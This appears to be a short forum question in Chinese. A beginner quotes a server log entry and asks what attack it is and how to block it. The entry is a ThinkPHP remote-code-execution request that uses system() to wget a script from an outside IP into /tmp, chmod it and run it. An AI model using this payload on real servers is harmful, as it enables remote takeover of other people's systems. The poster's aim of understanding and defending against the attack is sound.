我在安全方面的经验很少(仍在学习),但是在梳理我的日志时,我注意到了以下请求:
"GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
现在首先这对我来说毫无意义,除了chmod 777
告诉我有人试图更改我的文件权限。
我的问题是这是一种什么样的攻击,我可以采取什么措施来防止它?